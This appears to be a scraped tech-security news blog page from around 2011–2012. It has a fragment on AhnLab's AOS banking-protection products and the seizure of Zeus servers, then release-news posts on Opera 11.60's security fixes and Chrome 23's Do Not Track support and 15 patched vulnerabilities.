  • AOS Secure Browser: Provides a dedicated security browser that creates an independent and protected environment for online transactions. It secures user banking data against Man-In-The-Browser (MITB) attacks such as SpyEye and ZeuS, memory hacking, webpage alteration, HTML injection, cross-site scripting (XSS), browser help object (BHO) hacking, screen capturing, debugging, and reverse engineering.
  • AOS Anti-keylogger: Delivers the protection needed to keep account information safe and prevent theft of personal banking data during input via a keyboard.
  • AOS Firewall: Protects the user by detecting and blocking unauthorized intrusions and hacking attempts and preventing the leakage of personal information.
  • AOS Anti-virus/spyware: Secures online transactions against the latest malicious codes with AhnLab’s cloud based security technology known as ASD (AhnLab Smart Defense).
Yesterday we have discussed that Microsoft’s Digital Crimes Unit coordinated with several financial services organizations and the United States seized the two command-and-control servers of Zeus


-Source (Market-Watch)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Opera 11.60 Codenamed "Tunny" Released & Major Security Holes Fixed

Posted by Avik Sarkar On 12/08/2011 11:15:00 am


Opera 11.60 Final Version code named "Tunny" has been released by Opera Software. Opera 11.60 boasts three major new features, including revamped Address Bar, browser engine and mail client. Opera, which runs on Windows, Mac and Linux, has long been regarded as a pioneer when it comes to the web browser -- it was the first to introduce tabbed browsing, for example, and is still the only major browser to also include a mail client.
The Address Bar has been revamped to provide an experience similar to rival browsers such as Google Chrome and Mozilla Firefox in providing helpful suggestions as the user starts typing into the Address field. Version 11.60 also introduces a new shortcut, courtesy of a clickable star, to the Address Bar that makes it quick and easy to add the current web page to your Speed Dial or bookmarks menu.
Opera 11.60′s most visible new features are in the mail client’s extensive redesign, which Opera claims brings it in line with the browser’s "featherweight design aesthetic" The layout is cleaner, and messages are now grouped together by date, with options for grouping them by unread or pinned status, or not at all. Messages can also be pinned via a single click, with the pinning mapped to the IMAP \Flagged feature, ensuring compatibility with other IMAP clients, including Gmail’s Starred message status. The Mail toolbars have been simplified and redesigned icons coupled with easier access to the settings dialog (click the new Wrench button) provide weight to Opera’s claim that this makes the client easier to navigate and more intuitive to use. 
In this release opera updated addresses a vulnerability affecting some two- and three-letter top-level domains (TLD) that could allow cookies to be set for the TLD itself; these cookies could then be read by other sites using that TLD. A problem related to a weakness in the SSL v3.0 and TLS 1.0 specifications which could be used for eavesdropping attacks against some applications, and a cross-domain information leakage problem in the JavaScript "in" operator, have also been fixed.
In addition to the security fixes, Opera 11.60 has a new HTML engine that should, according to its developers, improve loading time for a majority of web sites, including pages using Secure Sockets Layer (SSL) encryption technology. Other changes include a completely revamped built-in mail client (M2) that's said to be easier to setup and use, and improvements to the address (URL) field to allow users to quickly add their favourite sites to the browser's Speed Dial.

To Download Opera 11.60 For Windows, Linux, Mac, BSD & Solaris Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Chrome 23 Closes 15 Security Vulnerabilities, Promises Longer Battery Life & Added Do Not Track (DNT)

Posted by Avik Sarkar On 11/09/2012 04:30:00 am

Chrome 23 Closes 15 Security Vulnerabilities, Promises Longer Battery Life & Added Do Not Track (DNT)

The searching giant Google finally included the Do Not Track (DNT) option into its first stable version of the company's browser which is Google Chrome 23. In February internet giant Google has agreed with the White House's Consumer Privacy Bill and here comes the result. Google has implemented the Do Not Track (DNT) header in its Chrome web browser.  Few months ago Microsoft made Do Not Track (DNT) facility available by default in Internet Explorer 10. Also the Redmond based software giant drew some criticism recently for its decision to enable Do Not Track by default in IE 10First it was Mozilla who proposed the Do Not Track mechanism, in Firefox in June 2011 when it released Firefox 5. The DNT option is disabled by default in Chrome and in order to turn it on, users need to go to the customization menu in the top right corner of the browser window. Then click on the Settings option in the left side and scroll down to open the Advanced Settings menu. Under the Privacy menu, check the box next to the "Send a 'Do Not Track' request with your browsing traffic" option. Once that option is enabled, the user will see a message explaining what the DNT system will do for them.
Not only DNT, with the release of Chrome 23, Google closes several security holes and promises to improve battery life for some users. For systems with dedicated graphics chips that support Chrome's GPU-accelerated video decoding, version 23 of the WebKit-based browser is said to significantly reduce power consumption. According to Google, batteries lasted on average 25% longer in its tests when GPU-accelerated video decoding was enabled compared to only using a system's CPU when streaming online videos. Version 23 of Chrome also addresses a total of 15 security vulnerabilities in the browser, 6 of which are rated as "high severity". These include high-risk use-after-free problems in video layout and in SVG filter handling, a integer bounds check issue in GPU command buffers and a memory corruption flaw in texture handling; a Mac-only problem related to wild writes in buggy graphics drivers has also been fixed. Eight medium-severity flaws including an integer overflow that could lead to an out-of-bounds read in WebP handling, and a low-risk have also been corrected. As part of its Chromium Security Vulnerability Rewards program, Google paid security researchers $9,000 for discovering and reporting these flaws. The update to Chrome also includes a new version of the Adobe Flash Player plugin which eliminates a number of critical vulnerabilities, all of which were discovered by the Google Security Team. Further information about the new features can be found in the release announcement, while a full list of security fixes is provided in a post on the Chrome Releases blog. Chrome 23.0.1271.64 is available to download for Windows, Mac OS X and Linux users. 


-Source (Google Chrome Blog, The-H & threatpost)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search